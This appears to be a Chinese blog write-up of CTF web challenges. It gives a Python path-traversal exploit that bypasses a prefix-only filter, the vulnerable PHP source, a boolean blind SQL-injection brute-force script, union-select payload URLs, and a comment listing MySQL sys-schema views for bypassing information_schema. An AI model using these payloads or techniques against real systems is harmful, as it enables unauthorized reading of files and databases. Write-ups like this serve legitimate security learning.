Author:颖奇L’Amore

Blog:www.gem-love.com

Misc-Depth是我出的题,需要递归造成RecursionError异常,然而Recursion Limit是随机数,所以本题需要首先分析算法然后构造异常然后想办法解决Recursion Limit随机数。源码都给了,具体的大家自己试吧


Ezinclude

沙雕题,因为gqy.jpg和/gqy.jpg获得相同回显,可以判断出一定在文件名前拼接了路径,这种情况是无法使用wrapper等手段的。又有waf,如果waf过滤掉了../那么这个包含将是绝对安全的。后来发现,如果f参数的开头给出一个目录再穿越就可以绕过waf了(这样出题很没意思)

exp:

#!/usr/bin/env python3
#-*- coding:utf-8 -*-
#__author__: 颖奇L'Amore www.gem-love.com
import requests as req
import base64 as b
import time as t
from urllib.parse import quote_plus as urlen

HOST = "http://183.129.189.60:10009/image.php?t={}&f=".format(int(t.time()))
file = 'y1ng/../../../../../../../flag'
file = b.b64encode(file.encode("utf-8")).decode("utf-8")
url = HOST+urlen(file)
print(req.get(url).text)

顺便读一下源码,谁会这么写waf= =

<?php

    if(!isset($_GET['t']) || !isset($_GET['f'])){
        echo "you miss some parameters";
        exit();
    }
    
    $timestamp = time();

    if(abs($_GET['t'] - $timestamp) > 10){
        echo "what's your time?";
        exit();
    }

    $file = base64_decode($_GET['f']);
    
    if(substr($file, 0, strlen("/../")) === "/../" || substr($file, 0, strlen("../")) === "../" || substr($file, 0, strlen("./")) === "./" || substr($file, 0, strlen("/.")) === "/." || substr($file, 0, strlen("//")) === "//") {
        echo 'You are not allowed to do that.';
    }
    else{
        echo file_get_contents('/var/www/html/img/'.$file);
    }

?>

SQLi

根据它的正则过滤了几个Time-based SQLi需要的关键字,以为要做笛卡尔积延时,然后发现可以直接布尔盲注

#!/usr/bin/env python3
#-*- coding:utf-8 -*-
#__author__: 颖奇L'Amore www.gem-love.com
import requests as req
import time as t
import base64 as b
import string
alpa = string.ascii_letters + string.digits
res = ''
#库名 利用limit注入 sqlidb
# http://183.129.189.60:10004/?id=1%27limit/**/1,1/**/PROCEDURE/**/ANALYSE(1)%23

#表名 flllaaaggg
payload = '''SELECT group_concat(table_name) FROM  sys.x$schema_flattened_keys WHERE table_schema='sqlidb' GROUP BY table_name limit 0,1'''

for i in range(1,100):
	for char in alpa:
		host = '''http://183.129.189.60:10004/?id=1'=(substr(({payload}),{i},1)='{char}')%23'''.format(payload=payload.replace(' ','/**/'), i=i, char=char)

		r = req.get(host)
		if r'admin666' in r.text:
			res += char
			print("found it: "+res)
			break
		t.sleep(0.2)

无列名注入,本来想无列名盲注,但是因为fllllaaaggg的表结构是id在前flag在后,无法根据flag来判断,(select 'y1ng','y1ng')>(select * from flllaaaggg)这种思路的盲注失败(实际上也可以做,我当时发现可以直接利用回显来构造payload就没再试)。然后想到题目有回显,直接构造联合查询即可:

http://183.129.189.60:10004/?id=100’/**/union/**/select/**/*,1/**/from/**/flllaaaggg%23

btw,可以联合查询,所以表也可以直接查的,不需要盲注:

http://183.129.189.60:10004/?id=100%27/**/union/**/SELECT/**/group_concat(table_name),2,3/**/FROM/**//**/sys.x$schema_flattened_keys/**/WHERE/**/table_schema='sqlidb'/**/GROUP/**/BY/**/table_name/**/limit/**/0,1%23

颖奇L'Amore原创文章,转载请注明作者和文章链接

本文链接地址:https://www.gem-love.com/ctf/2514.html

注:本站定期更新图片链接,转载后务必将图片本地化,否则图片会无法显示

分类: CTF

颖奇L'Amore

Most of the time is also called Y1ng. Cisco Certified Internetwork Expert - Routing and Switching. CTF player for team r3kapig. Forcus on Web Security. Islamic Scholar. Be good at sleeping and fishing in troubled waters.

2 条评论

th31nk · 2020年7月25日 18:34

请问师傅是怎么找到用来bypass information_schema的库的QWQ
之前在一些文章里看到的库基本被ban了个干净QWQ
https://www.anquanke.com/post/id/193512

    颖奇L'Amore · 2020年7月25日 18:50

    host_summary -> host、total_connections 历史连接IP、对应IP的连接次数
    innodb_buffer_stats_by_schema -> object_schema 库名
    innodb_buffer_stats_by_table -> object_schema、object_name 库名、表名(可指定)
    io_global_by_file_by_bytes -> file 路径中包含库名
    io_global_by_file_by_latency -> file 路径中包含库名
    processlist -> current_statement、last_statement 当前数据库正在执行的语句、该句柄执行的上一条语句
    schema_auto_increment_columns -> table_schema、table_name、column_name 库名、表名、列名
    schema_index_statistics -> table_schema、table_name 库名、表名
    schema_object_overview -> db 库名
    schema_table_statistics -> table_schema、table_name 库名、表名
    schema_table_statistics_with_buffer -> table_schema、table_name 库名、表名
    schema_tables_with_full_table_scans -> object_schema、object_name 库名、表名(全面扫描访问)
    session -> current_statement、last_statement 当前数据库正在执行的语句、该句柄执行的上一条语句
    statement_analysis -> query、db 数据库最近执行的请求、对于请求访问的数据库名
    statementswith* -> query、db 数据库最近执行的特殊情况的请求、对应请求的数据库
    version -> mysql_version mysql版本信息
    x$innodb_buffer_stats_by_schema 同innodb_buffer_stats_by_schema
    x$innodb_buffer_stats_by_table 同innodb_buffer_stats_by_table
    x$io_global_by_file_by_bytes 同io_global_by_file_by_bytes
    x$schema_flattened_keys -> table_schema、table_name、index_columns 库名、表名、主键名
    x$ps_schema_table_statistics_io -> table_schema、table_name、count_read 库名、表名、读取该表的次数

发表评论

电子邮件地址不会被公开。 必填项已用*标注

在此处输入验证码 : *

Reload Image